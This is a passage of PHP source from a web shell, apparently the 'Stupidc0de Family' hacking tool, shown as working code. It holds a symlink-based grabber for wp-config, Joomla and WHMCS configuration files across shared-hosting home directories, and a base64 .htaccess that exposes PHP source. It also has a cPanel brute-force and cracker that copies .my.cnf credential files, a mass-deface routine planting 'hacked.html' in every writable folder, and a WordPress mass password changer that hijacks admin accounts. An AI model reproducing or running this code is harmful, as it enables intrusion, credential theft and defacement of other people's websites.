723. symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
724. symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
725. symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
726. symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
727. symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
728. symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
729. symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
730. symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
731. symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
732. symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
733. symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
734. symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
735. symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
736. symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
737. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
738. symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
739. symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
740. symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
741. symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
742. symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
743. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
744. symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
745. symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
746. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
747. symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
748. symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
749. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
750. symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
751. symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
752. symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
753. symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
754. symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
755. symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
756. symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
757. symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
758. symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
759. symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
760. symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
761. symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
762. symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
763. symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
764. symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
765. symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
766. symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
767. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
768. symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
769. symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
770. symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
771. symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
772. symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
773. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
774. symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
775. symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
776. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
777. symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
778. symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
779. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
780. symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
781. symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
782. symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
783. symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
784. symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
785. symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
786. symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
787. symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
788. symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
789. symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
790. symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
791. symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
792. symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
793. symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
794. symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
795. symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
796. symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
797. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
798. symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
799. symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
800. symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
801. symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
802. symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
803. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
804. symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
805. symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
806. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
807. symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
808. symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
809. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
810. symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
811. symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
812. symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
813. symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
814. symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
815. symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
816. symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
817. symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
818. symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
819. symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
820. symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
821. symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
822. symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
823. symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
824. symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
825. symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
826. symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
827. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
828. symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
829. symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
830. symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
831. symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
832. symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
833. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
834. symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
835. symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
836. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
837. symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
838. symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
839. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
840. symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
841. symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
842. symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
843. symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
844. symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
845. symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
846. symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
847. symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
848. symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
849. symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
850. symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
851. symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
852. symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
853. symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
854. symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
855. symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
856. symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
857. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
858. symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
859. symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
860. symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
861. symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
862. symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
863. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
864. symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
865. symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
866. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
867. symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
868. symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
869. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
870. symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
871. symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
872. symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
873. symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
874. symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
875. symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
876. symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
877. symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
878. symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
879. symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
880. symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
881. symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
882. symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
883. symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
884. symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
885. symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
886. symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
887. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
888. symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
889. symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
890. symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
891. symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
892. symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
893. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
894. }
895.  
896. $d0mains = @file("/etc/named.conf");
897.  
898. if($d0mains)
899. {
900. mkdir($fn);
901. chdir($fn);
902.  
903. foreach($d0mains as $d0main)
904. {
905. if(eregi("zone",$d0main))
906. {
907. preg_match_all('#zone "(.*)"#', $d0main, $domains);
908. flush();
909.  
910. if(strlen(trim($domains[1][0])) > 2)
911. {
912. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
913.  
914. syml($user['name'],$domains[1][0]);
915. }
916. }
917. }
918. echo "<center><font color=springgreen size=3>Done</font></center>";
919. echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
920. }
921. else
922. {
923. mkdir($fn);
924. chdir($fn);
925. $temp = "";
926. $val1 = 0;
927. $val2 = 1000;
928. for(;$val1 <= $val2;$val1++)
929. {
930. $uid = @posix_getpwuid($val1);
931. if ($uid)
932. $temp .= join(':',$uid)."\n";
933. }
934. echo '<br/>';
935. $temp = trim($temp);
936.  
937. $file5 = fopen("test.txt","w");
938. fputs($file5,$temp);
939. fclose($file5);
940.  
941. $htaccess =
942. 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
943. aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
944. biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
945. ';
946. $file = fopen(".htaccess","w+");
947. $write = fwrite ($file ,base64_decode($htaccess));
948.  
949. $file = fopen("test.txt", "r") or exit("Unable to open file!");
950. while(!feof($file))
951. {
952. $s = fgets($file);
953. $matches = array();
954. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
955. $matches = str_replace("home/","",$matches[1]);
956. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
957. continue;
958. syml($matches,$matches);
959. }
960. fclose($file);
961. echo "</table>";
962. unlink("test.txt");
963. echo "<center><font color=springgreen size=3>Done</font></center>";
964. echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
965. }
966. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
967. exit;
968. }
969. ?>
970. <form method="POST" target="_blank">
971. <input name="page" type="hidden" value="find">
972. <table border=1>
973. <body bgcolor="black" text="white"><br><br>
974.  
975. <center><b><font size="2" style="italic" color="white">Cpanel BruteForce<br><br></b></center></td></tr>
976. <tr>
977. <td>
978. <strong>User :</strong>
979. </td>
980. <td>
981. <strong><textarea cols="50" style="background:#191818;outline:none;color:white;" rows="5" name="usernames"><?php system('ls /var/mail');?></textarea></strong>
982. </td>
983. <tr>
984. <td>
985. <strong>Pass :</strong>
986. </td>
987. <td>
988. <strong><textarea cols="50" style="background:#191818;outline:none;color:white;" rows="5" name="passwords"></textarea></strong>
989. </td>
990. </tr>
991. <tr>
992. <td>
993. <strong>Type :</strong>
994. </td>
995. <td>
996. <span style="background:#191818;outline:none;color:white;"><strong>Simple : </strong> </span>
997. <strong>
998. <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
999. <font style="background:black;outline:none;color:white;"><strong>/etc/passwd : </strong> </font>
1000. <strong>
1001. <input type="radio" name="type" value="passwd" style="background:black;outline:none;color:white;"></strong><span class="style3"><strong>
1002. </strong>
1003. </span>
1004. <td style="background:black;outline:none;color:white;" >
1005. <strong><input class ='bordergaya' type="submit" value="START"></strong>
1006. </td>
1007. </tr>
1008. </table>
1009. <br>
1010. <table border=1>
1011. </form>
1012. <tr>
1013. <td style="background:black;outline:none;color:white;">
1014. <strong>Get Wordlist</strong>
1015. <form method="POST" target="_blank">
1016. <strong>
1017. <input name="pass" type="hidden" value="password">
1018. </strong>
1019. <strong>Url Config :</strong>
1020. <td>
1021.  
1022. <strong>
1023. <input style="background:black;outline:none;color:white;" size="80" name="url" type="text"></strong>
1024.  
1025. <td style="background:black;outline:none;color:white;"><strong><input class ='bordergaya' type="submit" value="GO">
1026. </strong>
1027. </td>
1028. </table>
1029. <?php
1030. echo"<br/><br/>";
1031. break;
1032. }
1033. elseif(isset($_GET['x']) && ($_GET['x'] == 'massde'))
1034. {
1035. ?></center></center>
1036. <style type="text/css">
1037. .ketengah{
1038. text-align: left;
1039. font-size: 16px;
1040. color: orange;
1041. font-family: Homenaje;
1042. margin-left: 30%;
1043. </style>
1044. <?php
1045. /*thanks To IndoXploit*/
1046. function sabun_massal($path,$namafile,$isi_script) {
1047. if(is_writable($path)) {
1048. $patha = scandir($path);
1049. foreach($patha as $pathb) {
1050. $pathc = "$path/$pathb";
1051. $lokasi = $pathc.'/'.$namafile;
1052. if($pathb === '.') {
1053. file_put_contents($lokasi, $isi_script);
1054. } elseif($pathb === '..') {
1055. file_put_contents($lokasi, $isi_script);
1056. } else {
1057. if(is_dir($pathc)) {
1058. if(is_writable($pathc)) {
1059. echo "<font class='ketengah'><font color=crimson>-:-</font><font color=white>Sukses Bos Q</font><font color=crimson>-:-</font> <font color=springgreen>Cek di :</font> $lokasi</font><br>";
1060. file_put_contents($lokasi, $isi_script);
1061. $idx = sabun_massal($pathc,$namafile,$isi_script);
1062. }
1063. }
1064. }
1065. }
1066. }
1067. }
1068. if($_POST['start']) {
1069. echo "<div style='margin: 5px auto; padding: 5px'>";
1070. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1071. echo "</div>";
1072. } else {
1073. echo "<center>";
1074. echo "<form method='post'><br><br>
1075. <table>
1076. <tr>
1077. <td><font style='text-decoration: underline; margin-left:10px;'>Folder</font></td>
1078. <td align='center'>:</td>
1079. <td><input class='justborder' type='text' name='d_dir' value='$path' style='width: 95%;' height='10'><br></td>
1080. </tr>
1081. <tr>
1082. <td><font style='text-decoration: underline; margin-left:10px;'>Filename</font></td>
1083. <td align='center'>:</td>
1084. <td><input class='justborder' type='text' name='d_file' value='hacked.html' style='width: 95%;' height='10'><br></td>
1085. </tr>
1086. <tr>
1087. <td colspan='3' align='center'><font style='text-decoration: underline;'>Script Deface : </font><br></td>
1088. </tr>
1089. <tr>
1090. <td colspan='3'><textarea class='justborder' name='script' style='width: 500px; height: 200px;'>Hacked by Stupidc0de Family!</textarea><br></td>
1091. </tr>
1092. <tr>
1093. <td colspan='3' align='center'><input class='justborder' type='submit' name='start' value='Mass Deface' style='width: 50%;'><br/></td>
1094. </tr>
1095. </table><br><br><br>
1096. </form></center><br/>";
1097. }break;?><center><center><?php
1098. }
1099. elseif(isset($_GET['x']) && ($_GET['x'] == 'mpc'))
1100. {
1101. ?>
1102. <form action="?path=<?php echo $path; ?>&amp;x=mpc" method="post">
1103. <?php
1104. set_time_limit(0);
1105. ini_set('display_errors', 0);
1106.  
1107. echo '<center><h2>WordPress Mass Password Changer</h2><br /><br/></center>';
1108. echo '<form method="POST" action="" >
1109. <center><table border="1" class="justborder"><tr><td>Config List:</td>
1110. <td><textarea class="justborder" name="url" cols="50" rows="10" ></textarea></td></tr>
1111. <tr><td>User/Password</td><td><input class="justborder" type="text" name="username" size="25" value="Psrmrh"> /
1112. <input class="justborder" type="text" name="password" size="25" value="stupidc0de"></td></tr></table>
1113. <br><input class="bordergaya" type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';
1114.  
1115. if ($_POST['action']=='1'){
1116. if ($_POST['url']==''){
1117. echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>";
1118. }else{
1119. $url=$_POST['url'];
1120. $users = explode("\n",$url);
1121. foreach ($users as $user) {
1122. $user1=trim($user);
1123. $code=file_get_contents2($user1);
1124. preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
1125. $db=$b1[1][0];
1126. preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
1127. $user=$b2[1][0];
1128. preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
1129. $db_password=$b3[1][0];
1130. preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
1131. $host=$b4[1][0];
1132. preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
1133. $p=$b5[1][0];
1134.  
1135. $d=@mysql_connect( $host, $user, $db_password ) ;
1136. if ($d){
1137. @mysql_select_db($db );
1138. $usern=$_POST['username'];
1139. $passwd=$_POST['password'];
1140. $sql = "UPDATE `".$p."users` SET `user_pass` = MD5( '".$passwd."' ) WHERE `ID` = '1';";
1141. @mysql_query($sql) ; ;
1142. $sql = "UPDATE `".$p."users` SET `user_login` = '".$usern."' WHERE `ID` = '1';";
1143. @mysql_query($sql) ; ;
1144. $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
1145. $siteurl=@mysql_fetch_array($aa) ;
1146. $siteurl=$siteurl['option_value'];
1147. $tr.="$siteurl\n";
1148. mysql_close();
1149. }
1150. }
1151. if ($tr)
1152. $filename = 'changed.txt';
1153. $fp = fopen($filename, "a+");
1154. $write = fputs($fp, $tr);
1155. fclose($fp);
1156. echo "<div class='result'>Password Changing Completed ! :)<br><br>";
1157. echo "<a href='changed.txt' target='_blank'>View List of Password Changed Sites</a></div><br/>";
1158.  
1159. }
1160. }
1161. function file_get_contents2($u){
1162. $ch = curl_init();
1163. curl_setopt($ch,CURLOPT_URL,$u);
1164. curl_setopt($ch, CURLOPT_HEADER, 0);
1165. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
1166. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
1167. $result = curl_exec($ch);
1168. return $result ;
1169. }
1170. echo "<br /><br />";
1171. break;
1172. ?>
1173. <?php }
1174. elseif(isset($_GET['x']) && ($_GET['x'] == 'masstool'))
1175. {
1176. echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>";
1177. ?>
1178. <a href="?<?php echo "path=".$path; ?>&amp;x=massde"><input class=bordergaya type=submit value="Mass Deface" /></a>
1179. Or <a href="?<?php echo "path=".$path; ?>&amp;x=mpc"><input class=bordergaya type=submit value="Wordpress Mass Password Changer" /></a>
1180. Or <a href="?<?php echo "path=".$path; ?>&amp;x=zonesH"><input class=bordergaya type=submit value="Zone-H Mass Notifier" /></a>
1181.  
1182. <?php
1183. break;
1184. }
1185. elseif(isset($_GET['x']) && ($_GET['x'] == 'tentang'))
1186. {
1187. echo"<br><br>
1188. <center><b>
1189. <font face='Jolly Lodger' color='white' size='6px'> [+] Stupidc<font color='teal'>0</font>de Family [+]</font><br>
1190. <br>
1191. <font face='Fredericka The Great' color='white' size='3px'>&hearts; Respect Us, Little Crazy Family From Indonesia ^_^ &hearts;<br><br>
1192. -:- No Leader We Just Laugh Together -:-</font><br><br>
1193. <font color='gray'> http://www.stupidc0de.family/ </font><br><br><br>
1194. </center>
1195. </b>";
1196. break;
1197. }
1198.  
1199.  
1200. elseif(isset($_GET['x']) && ($_GET['x'] == 'cpanel'))
1201. {
1202. echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>";
1203. ?>
1204.  
1205. <a href="?<?php echo "path=".$path; ?>&amp;x=brute"><input class=bordergaya type=submit value="Cpanel Bruteforce" /></a>
1206. Or <a href="?<?php echo "path=".$path; ?>&amp;x=cpcrack"><input class=bordergaya type=submit value="Auto Cpanel Finder/Cracker" /></a>
1207. <br/><br/><br/><br/>
1208. <?php break; ?>
1209.  
1210. <?php
1211. }
1212. elseif(isset($_GET['x']) && ($_GET['x'] == 'cpcrack'))
1213. {
1214. ?>
1215. <form action="?path=<?php echo $path; ?>&amp;x=cpcrack" method="post">
1216. <?php
1217.  
1218. @ini_set('display_errors',0);
1219. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
1220. $ar0=explode($marqueurDebutLien, $text);
1221. $ar1=explode($marqueurFinLien, $ar0[$i]);
1222. return trim($ar1[0]);
1223. }
1224.  
1225. echo '<h1>Cpanel Finder/Cracker</h1><br/>';
1226.  
1227. echo "<center>";
1228. $d0mains = @file('/etc/named.conf');
1229. $domains = scandir("/var/named");
1230.  
1231. if ($domains or $d0mains)
1232. {
1233. $domains = scandir("/var/named");
1234. if($domains) {
1235. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1236. $count=1;
1237. $dc = 0;
1238. $list = scandir("/var/named");
1239. foreach($list as $domain){
1240. if(strpos($domain,".db")){
1241. $domain = str_replace('.db','',$domain);
1242. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1243. $dirz = '/home/'.$owner['name'].'/.my.cnf';
1244. $path = getcwd();
1245.  
1246. if (is_readable($dirz)) {
1247. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
1248. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
